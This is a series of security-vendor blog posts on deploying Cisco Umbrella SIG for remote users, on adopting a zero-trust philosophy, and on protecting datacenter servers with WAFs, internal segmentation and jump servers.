Umbrella SIG – Your Field Guide to Protecting the Remote User

The Problem

Here’s the situation – you have a group of users who work a hybrid schedule.  One of the users, while working at home, gets malware from a compromised website.  That malware-infected PC gets taken back to the office and put on the corporate network, whereupon the malware now can try and spread to other devices.  How do we protect against this kind of situation?

Historically, tools to manage remote device security on the endpoint itself were limited in their security capabilities or had undesirable effects on user experience.  Alternately, remote users would be required to VPN into the corporate office at time of boot, where all traffic would be sent over the VPN for processing by the on-premises security stack.  The first issue is that with a lot of remote users, the corporate firewall and the internet connections would be put under considerable load, perhaps enough to demand a larger firewall and faster Internet connections.  Second, there is a problem with what happens when the endpoint is off the VPN – there is still the potential for malware or user misbehavior in this case.  Setting up endpoints for always-on VPN (the VPN tunnel establishes itself pre-logon, usually with certificate based authentication) is a possibility, but always-on VPN is notoriously complex and finicky to deploy, making it a poor solution for most organizations.

Advanced Threats

Another demand on security is the need for SSL decryption to detect threats.  Modern malware also uses SSL encryption, and as such, is much harder to detect without decrypting and inspecting that traffic.  SSL decryption on an on-premises firewall has a substantial performance impact, often cutting firewall throughput in half or more – this makes it impractical for the traditional full tunnel VPN option.

A New Defense

These days, we have better tools.  A whole class of services known as SASE (secure access services edge) have arisen in response to the need to secure a distributed workforce.  However, SASE services all differ quite a bit due to how they’re implemented.  Most services require some form of always-on VPN for connection to the SASE service with all the complexity that entails to avoid the problem of what happens when the user isn’t on the VPN to the SASE service.

Our preferred SASE solution for remote workers is Umbrella SIG, as it addresses all the common problems I’ve discussed above.  SIG works a bit differently than other solutions, as it doesn’t rely on VPN connectivity.  Instead, traffic destined for the Internet gets proxied through the Umbrella cloud, where SSL decryption occurs, followed by inspection and filtering for malware and content restrictions. 

Agile and Effective: Umbrella SIG

So, what can SIG do from a security perspective? Here are the key capabilities:

  • File download scanning – files that match known malware signatures are blocked.
  • File type control – disallow users from downloading risky file types. For example, no normal user needs to download a .dll file to their laptop.
  • Detailed content filtering – block not just domains, but specific URLs within a domain. This is especially important with large, sprawling sites like Reddit that contain both legitimate and risky content.
  • Data Leak Prevention (DLP) – scan Internet-bound traffic for well-known or user defined data patterns that match controlled data such as credit card numbers or intellectual property.
  • SaaS Tenant Controls – keep users contained to the organization’s tenant for services like Microsoft 365.
  • CASB – Discover ‘shadow IT’ SaaS application usage and block access to those apps as needed.
  • Logging and Reporting – Get a clear picture of remote users’ Internet activities and what security events each user has caused.

SIG Simplifies Deploying SSL Decryption

Deploying SIG is much easier than most other SASE services. SIG has a streamlined deployment compared to other SASE services due to how it operates. As mentioned before, there is no need for always-on VPN or other invasive endpoint configurations that can break easily. Core features can also be implemented quickly – where there is complexity, it’s where it is inherent to the features available and not in setting up prerequisites. For example, SSL decryption will always need a certificate installed on the endpoint to not break the Internet, and choosing what to decrypt or not often needs input from other parts of the organization to ensure users’ private information isn’t compromised (think banking or medical information here – stuff that can cause liability to the organization by inspecting it.)

Your Umbrella SIG Deployment Guide

Here’s a guide to getting SIG up and running – this assumes that you currently have a fully functional Umbrella DNS deployment and want to expand that to SIG. I don’t go into the more complex features here, so consider this a starting point, not an authoritative guide.


Enable the Secure Web Gateway (SWG) capability remotely. Note that this requires the use of the new Cisco Secure Client (aka Anyconnect 5.0 or later) to work. SWG can be enabled globally or on a per-identity basis.

Install the Umbrella root certificate on the PCs/Macs to protect. Alternately, if you already have a local CA, your cert can be used in place of the Umbrella cert. Without this, enabling SSL decryption will completely break the Internet for the unfortunate users.

Next, define a list of categories, applications, and URLs to bypass SSL decryption. Some sites will need to be bypassed for functionality purposes (ex: Windows Update) while others will need to be bypassed for non-technical reasons (banking, health, or other sites that can leak protected information.)

Now it’s time to set up a SWG policy. First, we create a destination list (or several, as needs direct). Destination lists are how content filtering policies are applied. If you have a pre-built list of domains and URLs to filter, they can be imported into a destination list via .csv file.

Next, we configure the Web policy.

First, configure the global settings for the ruleset. This is where SSL decryption, file controls, logging, and general security settings are configured. Let’s start with SSL Decryption.

Enable the feature and associate a selective decryption list with it. Next, configure the other global settings as appropriate.

Following this, configure a ruleset for content filtering using the destination lists we created earlier. The individual rules follow the same mode of operation as an ACL – once a match occurs, traffic is either blocked or forwarded, so be careful of rule order to avoid shadowing. Be sure to add identities to each rule and ruleset for them to be applied!

Finally….

Test SWG settings before rolling it out to the entire organization. Note that once SWG is enabled globally, any endpoint with Secure Client and the Umbrella agent component will then forward all traffic to the Umbrella cloud to be proxied. No policy is applied unless identities are added to rulesets, so impact will be minimal until appropriate rulesets and identities are configured.

What is a Zero Trust Philosophy?

Zero Trust: Its a philosophy, not a plan

The Mindset

One of the current trends in IT security that gets a lot of press and discussion is the idea of zero trust.  Zero trust, however, is really a philosophy, not a plan of action.  Specifically, zero trust is the philosophy that all IT resources, whether internal or external, should be treated as untrusted or even potentially compromised.  While this philosophy is simple, applying it to a live environment can be anything but simple!  Adopting a zero trust mindset requires a holistic approach to security and good cooperation between all stakeholders in the organization in order to execute on this philosophy.  This even extends beyond the technology infrastructure and onto the employees and even organizational policies themselves. 

It’s important to keep in mind that the threat landscape is always changing – what may have been good practice five years ago may not be so today. This is what drove us at Crossconnect to develop a series of posts laying out how to adopt a zero trust philosophy in your organization.

Getting Started

This series will explore various aspects of technology infrastructure with an eye towards how things are built when done so with a zero trust mindset.  Before we get into those details, it’s always best to take some time to think about the big picture questions – many of the areas of security that we’ll talk about will have options that range from ‘very simple’ to ‘year-long project.’ Being able to figure out where effort needs to be made will go a long way towards creating an effective security infrastructure for your organization. 

Foundations of Zero Trust Philosophy

The first step in planning is to think about the capabilities of your organization and the threats you’re likely to face.  Many threats are industry or organization specific, but there are some that are universal.  First, of course, is ransomware – probably the biggest general threat most organizations will face.  Fraud and theft also rank high in terms of general threats.  Sometimes, the organization’s data itself is the target – there are plenty of groups out there who want confidential information for any number of reasons, even just to leak to the public.  And finally, compromising your organization may be done so that the bad actors can gain access to a 3rd party’s network via yours – think contractors and other service providers.

Next, look at your internal capabilities.  Security is, unfortunately, time-consuming to manage.  As such, it gets hard to manage some solutions with limited staff and budget.  Consider what your organization is capable of managing and monitoring when looking at security products and services – a simple but well-managed system is going to be more effective than a very capable, yet complex and maintenance-intensive system that gets neglected.

Once you have a good understanding of what your threats and capabilities are, then it’s time to build a plan.  The core of a security plan is to look at the applications in use, files/information that needs access, and the infrastructure that they run on, then figure out who/what needs access.  The goal is to limit access for any device, user, or application to only the resources it needs. 

Zero Trust Philosophy Index

This series will explore the areas of security that need to be addressed in order to make your plan a reality and to discuss specific areas of focus on how to apply a zero trust mindset.  

  • Datacenter
  • Route/switch
    • Features that ensure integrity of network operations
  • Wireless
    • Capabilities for detection and mitigation of RF based attacks
  • Endpoint
    • Network Access Control (NAC) – Ensuring that endpoint activity is controlled and that security threats are detected and mitigated before an exploit can occur
  • Network Security
    • Ensuring that all traffic through the network is controlled and monitored for malicious activity
  • Cloud Security
    • Ensuring that user to cloud access is controlled and that cloud resources are appropriately provisioned and accounted for.
  • The Human Factor
    • Ensuring that end users are aware of security issues and responsible for their security choices.

User to Machine Security

Zero Trust in the Datacenter – Protecting Your Servers from Your Users

For the first part of our explorations of the zero trust philosophy, we’re going to look at the datacenter. 

user to machine security, protecting the datacenter

It’s All in the Flow

When we look at the datacenter we have two types of traffic flows, each of which needs to be looked at from a security perspective.  First is user to machine security.  Protecting one’s datacenter resources from the users has always been a necessity, however the types of threats and what we consider a user have changed a lot over the years.  Second is machine to machine security.  This area of datacenter security is much newer and has historically been challenging and expensive to implement.  We’ll be focusing on user to machine security for now – machine to machine security will be discussed in a future post.

Note: What we discuss here can easily be applied to servers located on-prem, co-located, or even in the public cloud. 

On to User to Machine Security

The primary type of user to machine security is what’s commonly referred to as north-south security, where the focus is on Internet users.  Exposing necessary resources to the Internet is a requirement for obvious reasons, but Internet-based threats are omnipresent and can be of considerable sophistication.  It may seem obvious, but it bears repeating that any security policy should be built with only the necessary access privileges granted.  For Internet-facing users, this is usually easy – modern websites/applications usually just require that HTTP/HTTPS traffic coming in on ports 80 and 443 is allowed.  Legacy applications can complicate this process, though, so always work with the application team to understand all requirements for the application to function and build access policies appropriate to your environment.

Beyond simple access controls, it’s important to also consider what the users are inputting into the application. 

For example, putting malicious information in an HTTP POST request is a very common way of trying to get the application to give up information, grant inappropriate access requests, or otherwise misbehave in a way beneficial to the attacker.  How to abuse application inputs is going to be firmly out of scope for this post – whole books have been written on how to exploit things at the application level.  Addressing this kind of abuse is also more complicated, too.  Port and protocol filtering is really a go/no go type of rule, while inspecting inputs is a lot more complicated due to the much more open nature of user inputs.  There are application best practices for sanitizing user inputs, but especially with proprietary applications, it’s not always possible to do so.  It’s also better to be able to stop malicious traffic before it touches the application.  For this, we most commonly use a web application firewall (WAF). 

What is a WAF?

With a WAF, we can look directly at the payload of interesting packets and filter based on their contents.  For example, a field on a website that’s meant for name input shouldn’t ever have SQL syntax appearing in it.  On the WAF, a rule is created (using lots of regexes!) to ID anything like this and block it. WAFs and similar application specific security tools are, unfortunately, a Very Hard Thing to implement.  The nature of a WAF means that HTTPS traffic needs to be decrypted, which presents challenges in not breaking TLS.  Once that’s been dealt with, building appropriate rules needs close collaboration between the security and application teams to ensure that the WAF is blocking everything it should be, and that rules are updated as applications are updated or as threats emerge.  The infamous log4j vulnerability is one that a good WAF rule can easily block, but building that rule requires good Javascript knowledge and an understanding of how the vulnerability is exploited.  To see what a sample WAF rule blocking log4j exploit attempts looks like, F5 has a ready to go iRule available here

Other Machine to User Security Considerations

The next part of user to machine security is a somewhat newer topic in security – protecting your datacenter resources from your own users.  This is also referred to as internal segmentation.  Historically, trying to firewall your users from your datacenter was difficult, expensive, and of limited value.  Times have changed, and we’re at a point where your users can be as dangerous to the business as an Internet based threat.  Studies done on where attacks gain their initial foothold show that 90% or more attacks begin with a user opening a malicious email or running a bad executable file.  Once run, the malware will begin to crawl the network looking for other vulnerabilities to gain a foothold in the datacenter and then go to work exfiltrating or encrypting data or otherwise disrupting business operations.  With a traditional setup where internal users are considered trustworthy, their traffic is considered good by default and doesn’t warrant being firewalled.  This is not a good stance to have considering the above statistic. 

Callout: Internal segmentation of some variety should be considered a need to have in a modern security-first network design. 

Implementing Internal Segmentation

This is one of those tasks whose complexity is hard to determine.  On the simple end of the spectrum, putting some basic security ACLs in place at the border device between the DC and the users is surprisingly effective for the amount of effort it takes to implement.  Most organizations should be looking at a firewall for this purpose, though.  Modern firewalls will have many more options for inspecting traffic, detecting threats, and alerting IT staff when something is detected.  Some features are actually easier to implement on an internal segmentation firewall, too.  SSL inspection is one of the best examples of this.  Cracking open TLS traffic is a notoriously resource intensive task and if done for Internet-bound traffic, can easily overwhelm a firewall, break websites, or potentially cause HR issues when specific types of user communications are inspected (banking and health information are two major no-nos for deep packet inspection).   SSL inspection, when done between users and the datacenter, has none of these concerns.  Traffic volumes between users and the DC are often well-known and don’t change much, so firewalls can be effectively sized to avoid performance issues.

For user information concerns, interaction with internal resources and data is pretty much open season for whatever security you want to implement – there’s nothing in, say, an employee’s interactions with the organization’s ERP system that would be out of bounds to inspect, log, and audit.

Some Final Considerations

One final thing to consider is how to treat access for 3rd party contractors and how to properly categorize their traffic.  The prevailing wisdom these days is to treat 3rd party contractors as equivalent to Internet-facing users, as several high profile intrusions were launched via a 3rd party with direct access to sensitive resources.  It’s a little more difficult, though – simply just allowing ports 80 and 443 through to a list of servers isn’t enough.  3rd party contractors may need specialized access or just require a large number of permit rules compared to either an employee or Internet user, so close coordination with your 3rd party is required to keep access requirements to a minimum.  Due to the complexity of building network-based security policies suitable for contractors, another option that we’re seeing adopted more lately is deployment of jump servers with enhanced access management software, such as what Bomgar or SecureLink provide.  This type of software provides additional capabilities to the IT staff, such as full session monitoring, access notification, and the ability to only allow logins at specific times or only if explicitly approved by the IT staff.  With this level of control on the jump server, it becomes easier to build other security policies in a much more general way.  Since all users are accessing resources via a jump server, access control rules only have to permit a small number of hosts from known subnets, and detailed application based or port/protocol based rules can often be omitted or reduced in complexity.

Zero Trust Philosophy Index

This series in security philosophy will explore the areas of security that need to be addressed in order to make your plan a reality and to discuss specific areas of focus on how to apply a zero trust mindset.

  • Datacenter
  • Route/switch
    • Features that ensure integrity of network operations
  • Wireless
    • Capabilities for detection and mitigation of RF based attacks
  • Endpoint
    • Network Access Control (NAC) – Ensuring that endpoint activity is controlled and that security threats are detected and mitigated before an exploit can occur
  • Network Security
    • Ensuring that all traffic through the network is controlled and monitored for malicious activity
  • Cloud Security
    • Ensuring that user to cloud access is controlled and that cloud resources are appropriately provisioned and accounted for.
  • The Human Factor
    • Ensuring that end users are aware of security issues and responsible for their security choices.